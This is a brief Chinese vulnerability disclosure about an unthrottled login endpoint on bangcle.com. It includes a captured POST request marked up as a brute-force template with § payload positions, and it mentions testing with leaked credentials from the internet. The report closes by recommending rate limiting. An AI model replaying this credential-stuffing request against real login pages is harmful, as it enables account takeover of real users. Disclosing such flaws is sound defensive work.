梆梆安全登录接口缺陷可扫号
登录接口没有做限制可以撞库
http://www.bangcle.com/login/
登录抓包
POST /do_login/ HTTP/1.1 Host: www.bangcle.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.bangcle.com/do_login/ Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 88 domain=%2F&ru=%2F&mergeCode=&username=§123%40123.com§&password=§123123§&vercode=&authlogin=1
以网上泄露的数据进行测试
登录一下
对登陆接口加以限制。